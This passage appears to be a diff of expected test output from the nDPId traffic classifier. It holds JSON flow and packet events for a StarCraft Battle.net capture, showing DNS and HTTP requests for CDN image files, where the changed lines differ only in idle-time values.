00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":630,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985821,"flow_last_seen":1437389985821,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1437389985821,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":55468,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"bnetcmsus-a.akamaihd.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":631,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1437389985852,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1437389985852,"pkt":"hCYVPnXEIImEa8W6CABFAABGX2oAAIARVorAqAFkwKgB\/tisADUAMndemisBAAABAAAAAAAAC2JuZXRjbXN1cy1hCGFrYW1haWhkA25ldAAAAQAB"} 00650{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":632,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1437389985882,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1437389985882,"pkt":"IImEa8W6hCYVPnXECABFAAC0AABAAEARtYbAqAH+wKgBZAA12KwAoDk1miuBgAABAAQAAAAAC2JuZXRjbXN1cy1hCGFrYW1haWhkA25ldAAAAQABwAwABQABAAAAGwAlC2JuZXRjbXN1cy1hCGFrYW1haWhkA25ldAllZGdlc3VpdGXAIcA2AAUAAQAAUvQAEQVhMTk2MQFnBmFrYW1hacAhwGcAAQABAAAAEwAEAuQucMBnAAEAAQAAABMABALkLms="} 00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":632,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1437389985821,"flow_last_seen":1437389985882,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1437389985882,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.254","src_port":55468,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"bnetcmsus-a.akamaihd.net","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"2.228.46.112"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":633,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985891,"flow_last_seen":1437389985891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985891,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3527,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":633,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1437389985891,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985891,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LN5AAIAG2oXAqAFkAuQucA3HAFCKhzd4AAAAAIACIACLmQAAAgQFtAEDAwgBAQQC"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":634,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985892,"flow_last_seen":1437389985892,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985892,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3528,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":634,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1437389985892,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985892,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LN9AAIAG2oTAqAFkAuQucA3IAFBzB1TrAAAAAIACIACFpQAAAgQFtAEDAwgBAQQC"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":635,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985898,"flow_last_seen":1437389985898,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985898,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3529,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":635,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1437389985898,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985898,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LOBAAIAG2oPAqAFkAuQucA3JAFBxSWFcAAAAAIACIAB68QAAAgQFtAEDAwgBAQQC"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":636,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985898,"flow_last_seen":1437389985898,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985898,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3530,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":636,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1437389985898,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985898,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LOFAAIAG2oLAqAFkAuQucA3KAFB0cH\/ZAAAAAIACIABZTAAAAgQFtAEDAwgBAQQC"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":638,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985923,"flow_last_seen":1437389985923,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985923,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3531,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":638,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1437389985923,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985923,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LOJAAIAG2oHAqAFkAuQucA3LAFDKy4tMAAAAAIACIAD3fAAAAgQFtAEDAwgBAQQC"} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":639,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1437389985923,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985923,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDccmQrPVioc3eYASOQiYawAAAgQFtAEBBAIBAwMF"} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":640,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1437389985923,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985923,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLONAAIAG2ozAqAFkAuQucA3HAFCKhzd5JkKz1lAQAQARRAAA"} -00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":641,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985891,"flow_last_seen":1437389985925,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1437389985925,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3527,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_thumbnail\/gc\/GCF1DHMH8FDY1434670037434.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":642,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985925,"flow_last_seen":1437389985925,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985925,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3532,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":642,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1437389985925,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985925,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LOVAAIAG2n7AqAFkAuQucA3MAFCmW5TdAAAAAIACIAASWwAAAgQFtAEDAwgBAQQC"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":643,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985925,"flow_last_seen":1437389985925,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985925,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3533,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":643,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1437389985925,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985925,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LOZAAIAG2n3AqAFkAuQucA3NAFAjKxvdAAAAAIACIAAOiwAAAgQFtAEDAwgBAQQC"} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":644,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1437389985927,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985927,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDci+ghTYcwdU7IASOQiZNAAAAgQFtAEBBAIBAwMF"} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1437389985927,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985927,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLOdAAIAG2ojAqAFkAuQucA3IAFBzB1TsvoIU2VAQAQASDQAA"} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1437389985929,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985929,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDcngMONLcUlhXYASOQieXgAAAgQFtAEBBAIBAwMF"} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1437389985929,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985929,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLOhAAIAG2ofAqAFkAuQucA3JAFBxSWFd4DDjTFAQAQAXNwAA"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1437389985930,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985930,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDcrPCIDOdHB\/2oASOQjwXgAAAgQFtAEBBAIBAwMF"} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1437389985930,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985930,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLOlAAIAG2obAqAFkAuQucA3KAFB0cH\/azwiAz1AQAQBpNwAA"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":650,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985898,"flow_last_seen":1437389985931,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985931,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3529,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/yf\/YF9PRCZXJVPZ1428591254317.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":651,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985898,"flow_last_seen":1437389985945,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985945,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3530,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/0x\/0XQ1VXR8ZR271434128527471.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":652,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1437389985955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985955,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDcsAWb5HysuLTYASOQgfxgAAAgQFtAEBBAIBAwMF"} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":653,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1437389985955,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985955,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLOxAAIAG2oPAqAFkAuQucA3LAFDKy4tNAFm+SFAQAQCYngAA"} -00846{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":654,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985892,"flow_last_seen":1437389985955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1437389985955,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3528,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_thumbnail\/4j\/4J7OUIISCLTQ1436943629210.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":655,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985923,"flow_last_seen":1437389985955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985955,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3531,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/fa\/FA512IPUN0SE1436979936388.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":657,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1437389985957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985957,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDcy5z5mcpluU3oASOQil2AAAAgQFtAEBBAIBAwMF"} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":658,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1437389985957,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985957,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLO9AAIAG2oDAqAFkAuQucA3MAFCmW5Teuc+ZnVAQAQAesQAA"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":675,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985960,"flow_last_seen":1437389985960,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985960,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3534,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1437389985960,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985960,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LPVAAIAG2m7AqAFkAuQucA3OAFAbejKQAAAAAIACIAD\/hwAAAgQFtAEDAwgBAQQC"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":680,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985925,"flow_last_seen":1437389985961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985961,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3532,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/78\/78XH2UNU4JYK1434560551687.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1437389985962,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985962,"pkt":"IImEa8W6hCYVPnXECABFAAA0AABAADkGTmQC5C5wwKgBZABQDc1+R6dFIysb3oASOQjP5wAAAgQFtAEBBAIBAwMF"} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1437389985962,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985962,"pkt":"hCYVPnXEIImEa8W6CABFAAAoLPpAAIAG2nXAqAFkAuQucA3NAFAjKxvefkenRlAQAQBIwAAA"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985925,"flow_last_seen":1437389985962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985962,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3533,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"bnetcmsus-a.akamaihd.net","url":"bnetcmsus-a.akamaihd.net\/cms\/bnet_header\/mf\/MFTH8TS42HKX1430183778319.jpg","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":633,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985891,"flow_last_seen":1437389985891,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985891,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3527,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":633,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1437389985891,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985891,"pkt":"hCYVPnXEIImEa8W6CABFAAA0LN5AAIAG2oXAqAFkAuQucA3HAFCKhzd4AAAAAIACIACLmQAAAgQFtAEDAwgBAQQC"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":634,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985892,"flow_last_seen":1437389985892,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985892,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"2.228.46.112","src_port":3528,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 